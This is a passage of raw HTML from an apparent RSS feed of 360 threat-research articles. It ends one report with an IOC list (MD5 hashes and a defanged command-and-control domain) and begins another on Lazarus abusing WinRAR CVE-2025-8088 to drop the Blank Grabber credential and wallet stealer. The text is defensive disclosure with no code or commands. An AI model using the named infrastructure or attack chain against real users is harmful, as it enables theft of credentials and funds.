17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">值得注意的是，在此次活动中，该组织开始大规模使用近年来在网络犯罪界开始流行的Hijackloader，使用它的多个功能模块来实现恶意行为，技术手段趋于复杂化。这说明该组织及时跟进了恶意软件的发展潮流，不断丰富自身的工具储备，以提高攻击成功率，规避分析和检测。</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">5894fc151abb8d58439214304a4354b0</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">e8b6d147ed7712a7db9ab1ec3cfe734b</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4b917db1f7ddc803821b573f1bc2a91c</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">3f4699c17966857c625426fbbda039b3</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">C2 </span></span></strong></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">loque2025.mysynology[.]net</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]</span><span leaf=""><a href="https://www.trellix.com/blogs/research/analysis-of-hijackloader-and-its-infection-chain/" target="_blank">https://www.trellix.com/blogs/research/analysis-of-hijackloader-and-its-infection-chain/</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[2]<a href="https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader" target="_blank">https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader</a><a class="wx_topic_link" topic-id="mjchp65v-5pxm3b" style="color: #576B95 !important;" data-topic="1">#second</a>-stage-loading</span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[3]<a href="https://attack.mitre.org/techniques/T1055/013/" target="_blank">https://attack.mitre.org/techniques/T1055/013/</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[4]<a href="https://blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf" target="_blank">https://blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[5]<a href="https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/" target="_blank">https://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/</a></span></span></p></div></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507733">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8b42b278&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507733%26idx%3D1%26sn%3D3d730c508c604d313fa8b3a035ba9d44">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 19 Dec 2025 17:31:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-26（Lazarus）组织利用WinRAR漏洞部署Blank Grabber木马的技术分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507693&amp;idx=1&amp;sn=e73e1cca5af2ee80c3037daa1dbd2ab1</link>
      <description>近期360高级威胁研究院捕获Lazarus组织利用WinRAR漏洞进行投毒攻击的新型样本，攻击者将含有恶意脚本的RAR文件伪装为正常工具包诱导用户下载，受害者一旦解压文件便会触发恶意脚本释放并下载Blank Grabber信息窃取木马。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2025-12-12 17:30</span> <span style="display: inline-block;">北京</span></p>




  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a043b451&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK7fgbZEiaqPNnSLiacKva8uMcNlJajW0IRayFgibnicFoib7uHicYMmzFRHxQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近期360高级威胁研究院捕获Lazarus组织利用WinRAR漏洞进行投毒攻击的新型样本，攻击者将含有恶意脚本的RAR文件伪装为正常工具包诱导用户下载，受害者一旦解压文件便会触发恶意脚本释放并下载Blank Grabber信息窃取木马。</p>
  <div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-26</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">Lazarus</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-26（Lazarus）是近年来最为活跃、最具破坏性的国家级 APT 组织之一，其攻击活动跨越金融、制造、航空航天、政府机构及加密货币等多个高价值行业。该组织不仅具备复杂的跨平台攻击能力，还持续投入资源开发专用的漏洞利用链、持久化工具和多阶段载荷框架，以最大化攻击成功率和隐蔽性。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">近期360高级威胁研究院捕获Lazarus组织利用WinRAR漏洞CVE-2025-8088进行投毒攻击的新型样本，攻击者将含有恶意脚本的RAR文件伪装为正常工具包诱导用户下载，受害者一旦解压文件便会触发恶意脚本释放，随后该脚本下载Blank Grabber信息窃取木马。该木马主要针对Chromium系浏览器的密码、Cookies、自动填充数据，窃取Discord与Telegram完整会话，并针对MetaMask、Exodus、Electrum等20余种主流加密钱包的种子私钥进行窃取。通过此次详细分析及曝光披露，希望相关企业和个人能够提高安全防范意识，采取有效措施保护企业资产和用户财产免受损失。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 二、攻击活动分析 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 